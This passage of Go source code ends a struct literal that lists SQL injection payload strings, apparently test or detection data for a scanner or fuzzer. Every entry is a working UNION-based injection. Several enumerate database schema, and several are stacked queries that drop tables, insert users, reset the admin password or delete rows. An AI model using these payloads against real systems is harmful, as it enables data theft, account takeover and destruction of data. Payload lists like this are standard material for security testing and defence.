		{Type: "multi", Content: "' UNION SELECT 1,2,3 FROM (VALUES(1,2,3)) AS t(a,b,c)--"},
		{Type: "multi", Content: "' OR '1'='1' UNION SELECT 1,2,3--"},
		{Type: "multi", Content: "' OR '1'='1' UNION ALL SELECT NULL,NULL,NULL--"},
		{Type: "multi", Content: "' AND '1'='1' UNION SELECT 1,2,3--"},
		{Type: "multi", Content: "' AND '1'='2' UNION SELECT 1,2,3--"},
		{Type: "multi", Content: "') OR 1=1 UNION SELECT 1,2,3--"},
		{Type: "multi", Content: "') AND 1=1 UNION SELECT 1,2,3--"},
		{Type: "multi", Content: "') OR 1=2 UNION SELECT 1,2,3--"},
		{Type: "multi", Content: "\") OR 1=1 UNION SELECT 1,2,3--"},
		{Type: "multi", Content: "\") AND 1=1 UNION ALL SELECT 1,2,3--"},
		{Type: "multi", Content: "' UNION SELECT 1,2,3; SELECT 4,5,6--"},
		{Type: "multi", Content: "' UNION SELECT 1,2,3; DROP TABLE _tmp--"},
		{Type: "multi", Content: "' UNION SELECT 1,2,3; INSERT INTO users VALUES(1,'hack','pass')--"},
		{Type: "multi", Content: "' UNION SELECT 1,2,3; UPDATE users SET pass='hacked' WHERE user='admin'--"},
		{Type: "multi", Content: "' UNION SELECT 1,2,3; DELETE FROM users WHERE user='test'--"},
		{Type: "multi", Content: "' UNION SELECT 1,table_name,column_name,data_type FROM information_schema.columns LIMIT 1 OFFSET 0--"},
		{Type: "multi", Content: "' UNION SELECT 1,table_name,column_name,data_type FROM information_schema.columns LIMIT 1 OFFSET 5--"},
		{Type: "multi", Content: "' UNION SELECT 1,table_name,column_name,data_type FROM information_schema.columns LIMIT 1 OFFSET 10--"},
		{Type: "multi", Content: "' UNION SELECT 1,table_name FROM information_schema.tables LIMIT 1 OFFSET 0--"},
		{Type: "multi", Content: "' UNION SELECT 1,table_name FROM information_schema.tables LIMIT 1 OFFSET 5--"},
		{Type: "multi", Content: "' UNION SELECT 1,table_name FROM information_schema.tables LIMIT 1 OFFSET 10--"},
		{Type: "multi", Content: "' UNION SELECT 1,column_name FROM information_schema.columns WHERE table_name='users'--"},
		{Type: "multi", Content: "' UNION SELECT 1,column_name FROM information_schema.columns WHERE table_name='admin'--"},
		{Type: "multi", Content: "' UNION SELECT 1,column_name FROM information_schema.columns WHERE table_name='config'--"},
		{Type: "multi", Content: "1 UNION SELECT 1,2,3--"},
		{Type: "multi", Content: "0 UNION SELECT 1,2,3--"},
	},
}
